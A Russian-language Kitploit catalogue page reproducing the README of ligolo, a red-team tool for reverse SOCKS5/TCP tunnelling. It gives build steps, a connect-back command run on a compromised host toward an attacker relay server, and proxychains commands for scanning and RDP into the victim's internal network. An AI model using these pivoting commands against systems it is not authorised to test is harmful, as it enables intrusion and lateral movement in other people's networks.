Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ligolo — Обратное туннелирование, упрощённое для пентестеров и созданное пентестерами https://sysdream.com/ | Kitploit
Инструменты/GitHubGitHub/sysdream/ligolo
Латеральное перемещениеТестирование на ПроникновениеRed Teaming
GitHubsysdream/ligolo

ligolo

Обратное туннелирование, упрощённое для пентестеров и созданное пентестерами https://sysdream.com/

Репозиторий
1.8k227106 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Ligolo : Обратное туннелирование, упрощённое для пентестеров, созданное пентестерами

forthebadge forthebadge

Ligolo

Содержание

  • Введение
  • Варианты использования
  • Краткая демонстрация
  • Производительность
  • Использование
    • Настройка / Компиляция
    • Как использовать?
    • Коротко и ясно
  • Параметры
  • Возможности
  • Планы
  • Лицензирование
  • Авторы
  • Введение

    Ligolo — это простой и лёгкий инструмент для создания SOCKS5 или TCP туннелей из обратного соединения с полной безопасностью (TLS-сертификат с эллиптической кривой).

    Он сравним с Meterpreter в связке с Autoroute + Socks4a, но более стабилен и быстрее.

    Варианты использования

    Вы взломали сервер Windows / Linux / Mac в ходе внешнего аудита. Этот сервер находится внутри локальной сети, и вы хотите установить соединения с другими машинами в этой сети.

    Ligolo может настроить туннель для доступа к ресурсам внутреннего сервера.

    Краткая демонстрация

    Ретрансляция RDP-соединения с использованием Proxychains (WAN).

    RDP

    Производительность

    Ниже приведён скриншот теста скорости между двумя хостами на 100 Мбит/с (ligolo / localrelay). Производительность может варьироваться в зависимости от системы и сетевой конфигурации.

    Speedtest

    Использование

    Настройка / Компиляция

    Убедитесь, что Go установлен и работает.

    1. Получите Ligolo и зависимости
    root@kitploit:~
    cd `go env GOPATH`/src
    git clone https://github.com/sysdream/ligolo
    cd ligolo
    make dep
    
    1. Сгенерируйте самоподписанные TLS-сертификаты (будут размещены в папке certs)
    root@kitploit:~
    make certs TLS_HOST=example.com
    

    ПРИМЕЧАНИЕ: Вы также можете использовать собственные сертификаты, указав параметр TLS_CERT при вызове build. Пример: make build-all TLS_CERT=certs/mycert.pem.

    1. Сборка
    • 3.1. Для всех архитектур
    root@kitploit:~
    make build-all
    
    • 3.2. (или) Для текущей архитектуры
    root@kitploit:~
    make build
    

    Как использовать?

    Ligolo состоит из двух модулей:

    • localrelay
    • ligolo

    Localrelay предназначен для запуска на управляющем сервере (сервере атакующего).

    Ligolo — это программа, запускаемая на целевом компьютере.

    Для localrelay можно оставить параметры по умолчанию. Он будет прослушивать все интерфейсы на порту 5555 и ожидать подключений от ligolo (параметр -relayserver).

    Для ligolo необходимо указать IP-адрес ретрансляционного сервера (или вашего сервера атакующего) с помощью параметра -relayserver ip:port.

    Для справки используйте опцию -h.

    После установления соединения между Ligolo и LocalRelay на ретрансляционном сервере будет настроен SOCKS5-прокси на TCP-порту 1080 (вы можете изменить TCP-адрес/порт с помощью опции -localserver).

    После этого всё, что вам нужно сделать, — это использовать ваш любимый инструмент (например, Proxychains) и исследовать локальную сеть клиента.

    Коротко и ясно

    На вашем сервере атакующего:

    root@kitploit:~
    ./bin/localrelay_linux_amd64
    

    На взломанном хосте:

    root@kitploit:~
    > ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
    

    После установления соединения укажите следующие параметры в файле конфигурации ProxyChains (на сервере атакующего):

    root@kitploit:~
    [ProxyList]
    # add proxy here ...
    # meanwile
    # defaults set to "tor"
    socks5     127.0.0.1 1080
    

    Пользуйтесь.

    root@kitploit:~
    $ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
    $ proxychains rdesktop 10.0.0.123
    

    Параметры

    Параметры Localrelay:

    root@kitploit:~
    Usage of localrelay:
      -certfile string
        	The TLS server certificate (default "certs/server.crt")
      -keyfile string
        	The TLS server key (default "certs/server.key")
      -localserver string
        	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
      -relayserver string
        	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
    

    Параметры Ligolo:

    root@kitploit:~
    Usage of ligolo:
      -autorestart
        	Attempt to reconnect in case of an exception
      -relayserver string
        	The relay server (the connect-back address) (default "127.0.0.1:5555")
      -skipverify
        	Skip TLS certificate pinning verification
      -targetserver string
        	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
    

    Возможности

    • Туннель TLS 1.3 с привязкой сертификата (TLS pinning)
    • Мультиплатформенность (Windows / Linux / Mac / ...)
    • Мультиплексирование (одно TCP-соединение для всех потоков)
    • SOCKS5-прокси или простой ретранслятор

    Планы

    • Улучшенная обработка таймаутов
    • Поддержка UDP через SOCKS5
    • Реализация mTLS

    Лицензирование

    GNU General Public License v3.0 (см. LICENSING).

    Авторы

    • Nicolas Chatelain <n.chatelain -at- sysdream.com>

    Sysdream

    Скачать инструмент